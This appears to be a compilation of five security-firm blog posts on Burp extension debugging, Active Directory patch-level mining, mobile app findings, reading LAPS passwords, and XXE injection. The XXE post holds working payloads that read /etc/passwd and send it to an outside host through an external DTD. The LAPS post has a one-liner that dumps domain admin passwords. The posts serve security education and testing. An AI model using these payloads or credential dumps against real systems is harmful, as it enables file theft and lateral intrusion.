Back

Debugging Burp Extensions

Burp is a very useful tool for just about any type of testing that involves HTTP. What makes it even better is the extension support that it offers. People can compliant the features that Burp has to offer with their own extensions to create a very powerful well-rounded application testing tool that is tailored to their needs. Sometimes, however, our extensions don’t work the way we want and require additional testing. In this blog post, I’m going to walk through how we can setup debugging in Burp and our IDE when we create Burp extensions. Essentially, we are just going to be setting up Java remote debugging. This should hopefully be a useful tutorial for people who are creating buggy Burp extensions and want to figure out why they aren’t working. This should also be especially helpful for first time Java developers who are not accustomed to Java’s debugging capabilities. This will not be a tutorial on creating Burp extensions. For help on that, I’ll refer you to the PortSwigger extender tutorials here.

Requirements

Java SDK (1.7 or 1.8)

Java IDE (I prefer IntelliJ)

Burp Suite (latest free or pro edition)

Getting Started

To begin debugging extensions in Burp we first need an extension to debug. For this example, I’ll be using the Wsdler extension I created for parsing WSDL files. If you would like to follow along, the code for Wsdler is located here. We’ll pull this down from git using git clone.

C:UsersegruberRepositories>git clone git@github.com:NetSPI/Wsdler.git
Cloning into ‘Wsdler’…
remote: Counting objects: 458, done.
remote: Total 458 (delta 0), reused 0 (delta 0), pack-reused 458
Receiving objects: 100% (458/458), 19.59 MiB | 221.00 KiB/s, done.
Resolving deltas: 100% (204/204), done.
Checking connectivity… done.

Next, we’ll open this up in our IDE. I’m using IntelliJ, but this can be accomplished using any Java IDE (I think). Select File > Open and navigate to the directory and press OK. IntelliJ should open the directory as a project in its workspace.

Img Fb Cd

Attaching the Debugger

Now that we have our Burp extension in IntelliJ, let’s configure our debugger. Unfortunately, we can’t just hit Run > Debug to start debugging.

Img Fc C E

Burp extensions are executed inside Burp. They are generally not standalone jar files with a main class. We can still debug them however with the Java’s remote debugging capability. This allows the debugger to attach to a Java process and send and receive debug information. To do this, select Edit Configurations from Run.

Img Fcd Ad

A Run/Debug Configurations window should appear.

Img Fcfd

Press the green plus sign and select Remote. You should see a window that looks like this:

Img Fd E F

This allows us to setup remote debugging against running processes. Name the configuration whatever you like, I use Burp. Leave all the configuration options set to the defaults unless you know what you’re doing. Next, copy the first command line string. The one that starts -agentlib. You need to add this as an argument to your Java process for the debugger to attach to it. When executed, Java will open up the port 5005 for remote debugging. This allows the debugger to send commands through that port to the JVM process. Press OK at the bottom of the window. You should now see your debug configuration under Run.

Img Fe C B

Now we need to start Burp with the command line argument from our debug configuration. Open up a command prompt and start Burp with the argument.

C:>java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -jar burpsuite_pro_v1.6.18.jar
Listening for transport dt_socket at address: 5005

The JVM should now be listening on port 5005, the port we specified in our configuration. Next, we’ll go back to our IDE and select Run > Debug Burp. The console window should pop up saying it is connected to the target VM.

Img Ffaa F B

Setting Breakpoints

Now that we have our debugger attached to Burp we can start setting breakpoints in our extension code. First, make sure your extension is actually loaded in Burp’s extender!

When setting breakpoints, try not to set them on method names themselves. This can slow down Burp considerably. Instead, set breakpoints on lines of code within the methods you want to debug. The first breakpoint I’m going to set is within the WSDL parsing method in my extension. We will pause execution at the point the response byte array is set.

Img Caf A

If everything is setup, go back to Burp and execute whatever is needed for you extension to be used. In this example, I will right click on the request I want to parse the WSDL from and select Parse WSDL.

Img A C E

Our debugger should pause on the breakpoint immediately and display the current frames and variables.

Img F F D

We can walk through the code by selecting the step buttons on the top of the debugging menu.

Img Df

Stepping over the response assignment should reveal the response variable in the variables section of the debug console. The debugger should also be on the next line of code.

Img Dceda E

We can go further and step inside functions, but I’ll leave that out for now.

Conclusion

Hopefully this little tutorial is somewhat helpful when trying to fix your Burp extensions through debugging. I know I have spent hours debugging my own extensions and the Java debugger is immensely more helpful than having System.out.println() statements everywhere.

Back

A Faster Way to Identify High Risk Windows Assets

Scanning is a pretty common first step when trying to identify Windows systems that are missing critical patches.  However, there is a faster way to start the process.  Active Directory stores the operating system version and service pack level for every Windows system associated with the domain.  Historically that information has been used during penetration tests to target systems missing patches like MS08-67, but it can also be used by blue teams to help streamline identification of high risk assets as part of their standard vulnerability management approach.  In this blog I’ll cover a high level overview of how it can be done and point to a few scripts that can be used to help automate the process.

Introduction to Computer Accounts

When a system is added to a Windows domain, a computer account is created in Active Directory. The computer account provides the computer with access to domain resources similar to a domain user account. Periodically the computer account checks in with Active Directory to do things like rotate its password, pull down group policy updates, and sync OS version and service pack information. The OS version and service pack information are then stored in Active Directory as properties which can be queried by any domain user. This makes it a great source of information for attackers and blue teamers. There is also a hotfix property associated with each computer account in Active Directory, but from what I’ve seen it’s never populated. So at some point vulnerability scanning (or at least service fingerprinting) is required to confirm that systems suffer from critical vulnerabilities.

Vulnerability Scanner Feature Requests 🙂

To my knowledge, none of the major vulnerability scanners use the computer account properties from Active Directory during scanning (although I haven’t reviewed them all in detail). My hope is that sometime in the near future they’ll add some options for streamlining the identification of high risk Windows assets (and potentially asset discovery) using an approach like the one below.

  1. A vulnerability scanning profile for “High Risk Windows Systems Scan” could be selected in the vulnerability scanning software. The profile could be configured with least privileged domain credentials for authenticating to Active Directory. It could also be configured with network ranges to account for systems that are not part of the domain.
  2. A vulnerability scan could be started using the profile. The scan could connect to Active Directory via LDAP or the Active Directory Web Service (ADWS) and dump all of the enabled domain computers from Active Directory along with their OS version and Service Pack level.
  3. The results could be filtered using a profile configuration setting to only show systems that have checked in with Active Directory recently. Typically, if a system hasn’t checked in with Active Directory in a month, then it’s most likely been decommissioned without having its account disabled.
  4. The results could be filtered again for OS versions and service pack levels known to be out of date or unsupported.
  5. Finally, a credentialed vulnerability scan could be conducted against the supplied network ranges and the filtered list of domain systems pulled from Active Directory to help verify that they are actually vulnerable.

They may be obvious, but I’ve listed some of the advantages of this approach below:

  • High risk assets can be identified and triaged quickly.
  • Target systems don’t rely on potentially out of date asset lists.
  • The initial targeting of high risk systems does not require direct access to isolated network segments that are a pain to reach.
  • From an offensive perspective, the target enumeration usually goes undetected.

I chatted with Will Schroeder a little, and he added that it would be nice if vulnerability scanners also had an Active Directory vulnerability scanning profile to account for all of the misconfigurations that penetration testers commonly take advantage of. This could cover quite a few things including, but not limited to, insecure group policy configurations (covers a lot) and excessive priviliges related to deligated privileges, domain trusts, group inheritance, GPO inheritance, and Active Directory user/computer properties.

Automating the Process with PowerShell

Ideally it would be nice to see Active Directory data mining techniques used as part of vulnerability management programs more often.  However, I think the reality is that until the functionality comes boxed with your favorite vulnerability scanner it wont be a common practice.  While we all wait for that to happen there are a few PowerShell scripts available to help automate some of the process. I spent a little time writing a PowerShell script called “Get-ExploitableSystems.psm1” that can automate some of steps that I listed in the last section .  It was build off of work done in two great PowerShell projects: PowerTools (by Will Schroeder and Justin Warner) and Posh-SecMod (by Carlos Perez).

PowerView (which is part of the PowerTools toolkit) has a function called “Invoke-FindVulnSystems” which looks for systems that may be missing patches like MS08-67.  It’s fantastic, but I wanted to ignore disabled computer accounts, and sort by last logon dates to help determine which systems are alive without having to wait for ping replies.  Additionally, I built in a small list of relevant Metasploit modules and CVEs for quick reference.

I also wanted the ability to easily query information in Active Directory from a non-domain system.  That’s where Carlos’s PoshSec-Mod project comes in.  I used Carlos’s “Get-AuditDSComputerAccount” function as a template for authenticating to LDAP with alternative domain credentials via ADSI.

Finally, I shoved all of the results into a data table object. I’ve found that data tables can be really handy in PowerShell, because they allow you to dump out your dataset in a way that easily feeds into the PowerShell pipeline.  For more details take a look at the code on GitHub, but be warned – it may not be the prettiest code you’ve even seen. 😉

Get-ExploitableSystems.psm1 Examples

The Get-ExploitableSystems.psm1 module can be downloaded here.  As I mentioned, I’ve tried to write it so that the output works in the PowerShell pipeline and can be fed into other PowerShell commands like “Test-Connection” and “Export-Csv”.  Below are a few examples of standard use cases.

1. Import the module.

Import-Module Get-ExploitableSystems.psm1

2. Run the function using integrated authentication.

Get-ExploitableSystems

3. Run the function against a domain controller in a different domain and make the output pretty.

Get-ExploitableSystems -DomainController 10.2.9.100 -Credential demoadministrator | Format-Table –AutoSize

4. Run the function against a domain controller in a different domain and write the output to a CSV file.

Get-ExploitableSystems -DomainController 10.2.9.100 -Credential demoadministrator | Export-Csv c:tempoutput.csv –NoTypeInformation

5. If you’re still interested in pinging hosts to verify they’re up you can use the command below.

Get-ExploitableSystems -DomainController 10.2.9.100 -Credential demoadministrator | Test-Connection

Since Will is a super ninja PowerShell guru he has already integrated the Get-ExploitableSystems updates into PowerTools. So I recommend just using PowerTools moving forward.

Active Directory Web Service Example

As it turns out you can do the same thing pretty easily with Active Directory Web Services (ADWS). ADWS can be accessed via the PowerShell Active Directory module cmdlets, and basically used to manage the domain. To get them setup on a Windows 7/8 workstation you should be able to follow the instructions below.

1. Download and install “Remote Server Administration Tools” for Windows 7/8: https://www.microsoft.com/en-us/download/details.aspx?id=7887

2. In PowerShell run the following commands:

Import-Module ServerManager
Add-WindowsFeature RSAT-AD-PowerShell

3. Verify that the ActiveDirectory module is available with the following command:

Get-Module -ListAvailable

4. Import the Active Directory module.

import-module ActiveDirectory

Now you should be ready for action!

As I mentioned before, one of my requirements for the script was having the ability to dump information from a domain controller on a domain that my computer is not associated with, using alternative domain credentials. Khai Tran was nice enough to show me an easy way to do this with the Active Directory PowerShell provider. Below are the basic steps. In the example below a.b.c.d represent the target domain controller’s IP address.

New-PSDrive -PSProvider ActiveDirectory -Name RemoteADS -Root "" -Server a.b.c.d -credential domainuser
cd RemoteADS:

Now every PowerShell AD command we run should be issued to the remote domain controller. 🙂 I recently came across a really nice PowerShell presentation by Sean Metcalf called “Mastering PowerShell and Active Directory” that covers some useful ADWS command examples. Below is a quick code example showing how to dump active computer accounts and their OS information based on his presentation.

$tendays=(get-date).AddDays(-10);Get-ADComputer -filter {Enabled -eq $true -and LastLogonDate -gt $tendays } -Properties samaccountname,Enabled,LastLogonDate,OperatingSystem,OperatingSystemServicePack,OperatingSystemHotFix | select  name,Enabled,LastLogonDate,OperatingSystem,OperatingSystemServicePack,OperatingSystemHotFix | format-table -AutoSize

The script only shows enabled computer accounts that have logged in within the last 10 days. You should be able simply change the -10 if you want to go back further. However, after some reading it sounds like the “LastLogonDate” is relative to the domain controller you’re querying. So to get the real “LastLogonDate” you’ll have to query all of the domain controllers.

Wrap Up

In this blog I took a quick look at how common Active Directory mining techniques used by the pentest community can also be used by the blue teams to reduce the time it takes to identify high risk Windows systems in their environments. Hopefully, as time goes on, we’ll see vulnerability scanners and SIEM solutions using them too. Whatever side you’re on (red or blue) I hope the information has been useful. Have fun and hack responsibly. 🙂

References

Back

Top 10 Critical Findings of 2014 – Mobile Applications

We saw a very large increase in the number of mobile applications we tested in 2014. Among them, there were slightly more iOS applications than Android ones. In this blog post I will cover high level trends and the top 10 critical vulnerabilities we saw in 2014 during mobile applications penetration tests.

High Level Trends

There were a lot of new trends in 2014 compared to previous years. I’ve listed some of the more interesting ones below.

  • An increase in the use of cross-platform development frameworks such as PhoneGap, Appcelerator, and Xamarin to write applications that can be deployed to both iOS and Android
  • A decrease in wrapped browser (webview) applications
  • An increase in the use of MDM solutions to push out applications to enterprise devices
  • An increase in the use of MDM solutions to encrypt application traffic
  • A decrease in applications using the local SQLite database to store anything but configuration information
  • An increase in applications using root/jailbreak detection to prevent installation
  • An increase in certificate pinning to help prevent encrypted traffic interception

In my previous Top 10 blog post on Thick Applications, I pointed out that we spend most of our time testing web services. This is also true with mobile applications. You may also notice that many of the findings listed here are also found in the thick application post. It just goes to show that new hot-off-the-press mobile applications suffer from the same problems that plague thick applications created fifteen years ago.

So without further ado, here are the top 10 critical mobile applications findings for 2014 list in order from most to least common.

SQL Injection

SQL injection is still very prevalent via the web services of a mobile application. Rarely if ever do we see it against an application’s local SQLite database however.  We often see that application developers take the mobile aspect for granted and don’t properly protect their web services on the backend. However, it is very easy to proxy a connection between a device and a server on iOS and Android. Don’t rely on protective measures such as certificate pinning to prevent traffic tampering, it’s not effective. Fix the issue at it’s heart.

Cleartext Credential Storage

We often see that mobile applications store unencrypted credentials within configuration files and local SQLite databases on a device. Usually they can be used to access potential sensitive data and external services. This is bad. Never store credentials anywhere on a device. If your application stores credentials to re-authenticate to a backend service without the user having to provide them again, consider using a time-limited session key that can be destroyed.

Hardcoded Credentials in Source Code

This is pretty common for us to find and primarily affects Android applications because they can be decompiled back to nearly complete Java code if they’re not obfuscated. It is possible to disassemble iOS binaries and search for credentials in them too. Never hardcode credentials in the code of an application. If a user can access your application, they can undoubtably access anything within the source code as well. Never assume people aren’t looking.

Hardcoded Encryption Keys

We see encryption keys hardcoded in source code all the time. Again, this primarily affects Android applications because of the relatively ease of decompiling APK files. As I said in my thick application post, encryption is only as strong as where the key is held. The recommendation is also the same. If data requires encryption with a key, move it from the client to the server to prevent access to keys.

Hardcoded or Nonexistent Salts

I’ll take the exact blurb that I used in my thick application post. When using encryption, it is always a good idea to use a salt. However, if that salt is hardcoded in an application with an encryption key, it becomes pretty much useless. When it comes to encryption being a salty S.O.B. is a good thing. Randomize! Randomize! Randomize!

XML External Entity Injection

This has become more prevalent in the past year with many mobile web services communicating with XML. XXE often results in read access to files on the server and UNC path injection that can be used to capture and crack credentials used to on associate web server if it is running Windows. Most XML parsing libraries support disallowing declared DTDs and entities. This should be set as the default when reading XML to help prevent injection. Another possible fix is to scrap XML all together and instead use JSON where this isn’t an issue.

Logging of Sensitive Information

Logging of data is fairly common in applications that we test both in production and QA environments. Often times it comes from having some type of debugging option enabled. This isn’t necessarily a bad thing until there’s data that you don’t want anyone to see. The most common sensitive data we see are credentials. Make sure that debugging is disabled for productions applications and check application and system logs during testing to ensure unintended data is not there.

Unencrypted Transmission of Data

This is still common to see in mobile applications. Every application we test uses web services, but not all use encryption. Utilizing TLS should be the default on all traffic coming to and from the application. Often times we see this in mobile applications developed for use in internal environments where security requirements are unfortunately more relaxed. Throw that notion out the window and encrypted everything.

Authorization Bypass

As with thick applications, we see a lot of mobile applications use the GUI to enforce security controls without checking authorization on the backend. A user could access what they need by bypassing the GUI entirely and sending the requests they want directly through a proxy such as Burp. We have also seen applications pulling user permissions from the server and storing them on the client. A user could modify the permissions from the HTTP response before it reaches the client. Usually these permissions are worded in such a way that there meaning is obvious such as has_access_to_secret_information=false. Replacing everything with true is an easy way to bump up your privileges and bypass intended application authorization. The solution is to never rely on the client for authorization checks.

Sensitive Data Displayed in the GUI

This finding is pretty self explanatory. An application displays cleartext passwords, social security numbers, credit card numbers, etc… unmasked within the GUI. This is bad not only because that information should generally not be displayed to the user, but also because it has to be stored either on the device or within a backend database somewhere. This is also bad if coupled with mobile applications not requiring users to re-authenticate if the application has been put into the background on the device. For example, it you have an application open and you hit the home button on an iOS device, the application is paused in the background. Selecting the application again will generally reopen it where you left off. So if you give someone your iPad after you looked at an application that doesn’t mask sensitive information about you, that someone could just open it up again and see everything. This can be especially bad if you don’t have a password set on your lockscreen.

Conclusion

Everything is going mobile, and the security of the information that can be accessed and stored should be priority number one. Take the above information in consideration when developing your mobile applications and always remember to test. If you’re not testing your apps, someone else will, and they probably won’t be so candid about what they find.

Back

Running LAPS Around Cleartext Passwords

Intro

Managing credentials for local administrator accounts is hard to do. From setting strong passwords, to setting unique passwords across multiple machines, we rarely see it done correctly. On the majority of our pen tests we see that most of the domain computers are configured with the same local admin credentials. This can be really handy as an attacker, as it provides us lateral access to systems across the network.

One of the reported fixes (from Microsoft) is to store the local admin passwords in LDAP as a confidential attribute of the computer account. This can be automated using Microsoft tools and strong local passwords can be enforced (and automatically changed). In theory, this is a nice idea. But in practice it results in the cleartext storage of passwords (not good). Previous attempts at local administrator credential management (from Microsoft) resulted in local administrator credentials being exposed to all users on the domain (through group policy preferences). The GPP cpassword storage passwords issue was fixed (5/13/14) and we’re not seeing it as frequently any more.

LAPS

Img E C A A

LAPS is Microsoft’s tool to store local admin passwords in LDAP. As long as everything is configured correctly, it should be fine to use. But if you don’t set the permissions correctly on the LDAP attributes, you could be exposing the local admin credentials to users on the domain. LAPS uses two LDAP attributes to store the local administrator credentials, ms-MCS-AdmPwd (stores the password) and ms-MCS-AdmPwdExpirationTime (stores when it expires). The Microsoft recommendations says to remove the extended rights to the attributes from specific users and groups. This is a good thing to do, but it can be a pain to get set up properly. Long story short, if you’re using LAPS, someone on the domain should be able to read those local admin credentials in cleartext. This will not always be a privilege escalation route, but it could be handy data to have when you’re pivoting to sensitive systems after you’ve escalated. In our demo domain, our LAPS deployment defaulted to allowing all domain users to have read access to the password. We also could have screwed up the install instructions.

I put together a quick PowerShell script to pull the LAPS specific LDAP attributes for all of the computers joined to the domain. I used Scott Sutherland’s Get-ExploitableSystems script (now included in PowerView) as the template. You can find it on my GitHub page.

Script Usage and Output

Here’s the output using an account that does not have rights to read the credentials (but proves they exist):

PS C:> Get-LAPSPasswords -DomainController 192.168.1.1 -Credential DEMOkarl | Format-Table -AutoSize

Hostname                    Stored Readable Password Expiration
--------                    ------ -------- -------- ----------
WIN-M8V16OTGIIN.test.domain   0      0               NA
WIN-M8V16OTGIIN.test.domain   0      0               NA
ASSESS-WIN7-TEST.test.domain  1      0               6/3/2015 7:09:28 PM

Here’s the same command being run with an account with read access to the password:

PS C:> Get-LAPSPasswords -DomainController 192.168.1.1 -Credential DEMOadministrator | Format-Table -AutoSize

Hostname                    Stored Readable Password       Expiration
--------                    ------ -------- --------       ----------
WIN-M8V16OTGIIN.test.domain   0      0                     NA
WIN-M8V16OTGIIN.test.domain   0      0                     NA
ASSESS-WIN7-TEST.test.domain  1      1      $sl+xbZz2&qtDr 6/3/2015 7:09:28 PM

The usage is pretty simple and everything is table friendly, so it’s easy to export to a CSV.

Special thanks to Scott Sutherland for letting me use his Get-ExploitableSystems script as the bones for the script. The LDAP query functions came from Carlos Perez’s PoshSec-Mod (and also adapted from Scott’s script). And the overall idea to port this over to a Powerview-friendly function came from a conversation with @_wald0 on Twitter.

Links

LDAP is a great place to mine for sensitive data. Here’s a couple of good examples:

Bonus Material

If you happen to have the AdmPwd.PS PowerShell module installed (as part of LAPS), you can use the following one-liner to pull all the local admin credentials for your current domain (assuming you have the rights):

foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
Back

Forcing XXE Reflection through Server Error Messages

XML External Entity (XXE) injection attacks are a simple way to extract files from a remote server via web requests. For easy use of XXE, the server response must include a reflection point that displays the injected entity (remote file) back to the client. Below is an example of a common XXE injection request and response. The injections have been highlighted.

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/xml
Content-Length: 2467

<?xml version="1.0" encoding="UTF-8"?>
<errors>
<error>no results for name root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....
</error>
</errors>

However, it’s also very common for nothing to be returned in the error response if the application doesn’t reflect any user input back to the client. This can make simple XXE attacks harder. If connections are allowed to remote systems from the vulnerable server then it’s possible to use an external DTD to extract local files via web requests. This technique has been covered in greater detail at this whitepaper but below is an overview of how the modified XXE injection technique works and can be executed.

1. Host a .dtd file on a web server that is accessible from the vulnerable system. In my example the “netspi.dtd” file is hosted on xxe.netspi.com. The DTD file contains a XXE injection that will send the contents of the /etc/password file to the web server at https://xxe.netspi.com.

<!ENTITY % payload SYSTEM “file:///etc/passwd”>

<!ENTITY % param1 ‘<!ENTITY % external SYSTEM “https://xxe.netspi.com/x=%payload;”>’> %param1; %external;

2. Next, the attack can be executed by referencing the hosted DTD file as shown below. The request does not even have to contain any XML body, for as long as the server processes XML requests.

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 139

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo SYSTEM "https://xxe.netspi.com/netspi.dtd">
<root>
<search>name</search>
</root>

3. At this point the XXE attack results in a connection to xxe.netspi.com to load the external DTD file. The hosted DTD file then uses parameter entities to wrap the contents of the /etc/passwd file into another HTTP request to xxe.netspi.com.

4. Now it may be possible to extract the contents of /etc/passwd file without having a reflection point on the page itself, but by reading incoming traffic on xxe.netspi.com. The file contents can be parsed from web server logs or from an actual page.

I should note that only a single line of /etc/passwd can be read using this method, or the HTTP request may fail altogether because of line breaks in the target file. There is another option though. In some cases it’s also possible to make data extraction easier by forcing an error on the server by adding an invalid URI to the request.  Below is an example of a modified DTD:

<!ENTITY % payload SYSTEM “file:///etc/passwd”>
<!ENTITY % param1 ‘<!ENTITY % external SYSTEM “file:///nothere/%payload;”>’> %param1; %external;

If the server displays verbose errors to client, the error may contain the file contents of the file that’s getting extracted. Below is an example:

HTTP Response:

HTTP/1.1 500 Internal Server Error
Content-Type: application/xml
Content-Length: 2467

<?xml version="1.0" encoding="UTF-8"?><root>
<errors>
<errorMessage>java.io.FileNotFoundException: file:///nothere/root:x:0:0:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....

The invalid file path causes a “FileNotFoundException”, and an error message that contains /etc/passwd file contents. This same technique was recently covered in this Drupal XXE whitepaper as well but as I had the blog written I thought I could as well publish it 🙂

References

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X